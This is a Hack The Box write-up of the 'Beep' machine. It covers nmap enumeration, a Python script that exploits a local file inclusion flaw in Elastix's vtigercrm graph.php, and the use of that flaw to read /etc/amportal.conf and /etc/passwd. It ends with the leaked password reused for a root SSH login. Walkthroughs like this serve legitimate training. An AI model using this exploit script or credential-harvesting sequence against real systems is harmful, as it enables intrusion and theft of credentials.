Content
Welcome to the Beep writeup from HTB
tags:
Welcome to the Beep writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Beep
tags: HTB
Easy
Linux
OSCP
Platform: Hackthebox
Difficult: Easy
S.O.: Linux
Link: Click here
Enumeration
Nmap
To get started, we run a quick open ports scan.
# nmap -p- -T4 10.10.10.7
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-17 19:51 CET
Nmap scan report for 10.10.10.7
Host is up (0.094s latency).
Not shown: 65519 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
143/tcp open imap
443/tcp open https
878/tcp open unknown
993/tcp open imaps
995/tcp open pop3s
3306/tcp open mysql
4190/tcp open sieve
4445/tcp open upnotifyp
4559/tcp open hylafax
5038/tcp open unknown
10000/tcp open snet-sensor-mgmt
Nmap done: 1 IP address (1 host up) scanned in 37.04 seconds
Now that we know the open ports, let's scan them in depth.
# nmap -A -Pn -p 22,25,80,110,111,143,443,878,993,995,3306,4190,4445,4559,5038,10000 10.10.10.7
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-17 19:53 CET
Nmap scan report for 10.10.10.7
Host is up (0.093s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: APOP USER TOP IMPLEMENTATION(Cyrus POP3 server v2) AUTH-RESP-CODE RESP-CODES PIPELINING LOGIN-DELAY(0) UIDL EXPIRE(NEVER) STLS
111/tcp open rpcbind 2 (RPC #100000)
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: RIGHTS=kxte CHILDREN LITERAL+ CONDSTORE SORT OK RENAME Completed IDLE LIST-SUBSCRIBED THREAD=ORDEREDSUBJECT UNSELECT X-NETSCAPE URLAUTHA0001 IMAP4rev1 IMAP4 ATOMIC QUOTA ACL THREAD=REFERENCES ANNOTATEMORE CATENATE LISTEXT SORT=MODSEQ UIDPLUS MAILBOX-REFERRALS BINARY MULTIAPPEND ID NAMESPACE STARTTLS NO
443/tcp open ssl/https?
|_ssl-date: 2021-03-17T20:01:31+00:00; +1h04m45s from scanner time.
878/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL (unauthorized)
4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp open upnotifyp?
4559/tcp open hylafax HylaFAX 4.3.10
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|media device|WAP|PBX|printer|specialized|storage-misc
Running (JUST GUESSING): Linux 2.6.X|2.4.X (95%), Linksys embedded (94%), HP embedded (94%), Riverbed RiOS (93%), Gemtek embedded (93%), Siemens embedded (93%), IBM embedded (93%)
OS CPE: cpe:/o:linux:linux_kernel:2.6.18 cpe:/o:linux:linux_kernel:2.6.27 cpe:/o:linux:linux_kernel:2.4.32 cpe:/h:linksys:wrv54g cpe:/o:riverbed:rios cpe:/h:gemtek:p360 cpe:/h:siemens:gigaset_se515dsl cpe:/h:ibm:ds4700
Aggressive OS guesses: Linux 2.6.18 (95%), Linux 2.6.9 - 2.6.24 (95%), Linux 2.6.9 - 2.6.30 (95%), Linux 2.6.27 (likely embedded) (95%), Linux 2.6.20-1 (Fedora Core 5) (95%), Linux 2.6.27 (95%), Linux 2.6.5 - 2.6.12 (95%), Linux 2.6.8 (Debian 3.1) (95%), Linux 2.6.18 - 2.6.32 (95%), Linux 2.6.22 - 2.6.23 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix
Host script results:
|_clock-skew: 1h04m44s
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 94.02 ms 10.10.14.1
2 93.97 ms 10.10.10.7
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 355.57 seconds
Elastix
The machine has Elastix
installed which has a LFI vulnerability with which we can read system files such as the amportal.conf
file with the portal configuration.
To do this, we are going to write a simple Python
script using requests
.
import requests, sys
url = 'https://{}/vtigercrm/graph.php?current_language=../../../../../../../../{}%00&module=Accounts&action'.format(sys.argv[1], sys.argv[2])
s = requests.session()
r = s.get(url, verify=False)
print(r.text)
Exploitation
Perfect, reading the configuration file we have obtained the username and password of the database and of the panel.
# python3 lfi.py beep.htb /etc/amportal.conf
# This file is part of FreePBX.
#
# FreePBX is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# FreePBX is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with FreePBX. If not, see <http://www.gnu.org/licenses/>.
#
# This file contains settings for components of the Asterisk Management Portal
# Spaces are not allowed!
# Run /usr/src/AMP/apply_conf.sh after making changes to this file
# FreePBX Database configuration
# AMPDBHOST: Hostname where the FreePBX database resides
# AMPDBENGINE: Engine hosting the FreePBX database (e.g. mysql)
# AMPDBNAME: Name of the FreePBX database (e.g. asterisk)
# AMPDBUSER: Username used to connect to the FreePBX database
# AMPDBPASS: Password for AMPDBUSER (above)
# AMPENGINE: Telephony backend engine (e.g. asterisk)
# AMPMGRUSER: Username to access the Asterisk Manager Interface
# AMPMGRPASS: Password for AMPMGRUSER
#
AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE
Post exploitation
Enumeration
Using the LFI
we can list the available users with shell to try to connect using SSH
.
# python3 lfi.py beep.htb /etc/passwd | grep bash
/usr/local/lib/python3.9/dist-packages/urllib3/connectionpool.py:846: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
warnings.warn((
root:x:0:0:root:/root:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
spamfilter:x:500:500::/home/spamfilter:/bin/bash
fanis:x:501:501::/home/fanis:/bin/bash
SSH
Well, trying with all users, we can connect directly with root!
# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 root@beep.htb
root@beep.htb's password:
Last login: Tue Jul 16 11:45:47 2019
Welcome to Elastix
----------------------------------------------------
To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7
[root@beep ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@beep ~]# cat /home/fanis/user.txt
CENSORED_FLAG
[root@beep ~]# cat root.txt
CENSORED_FLAG
[root@beep ~]#
Easy peacy!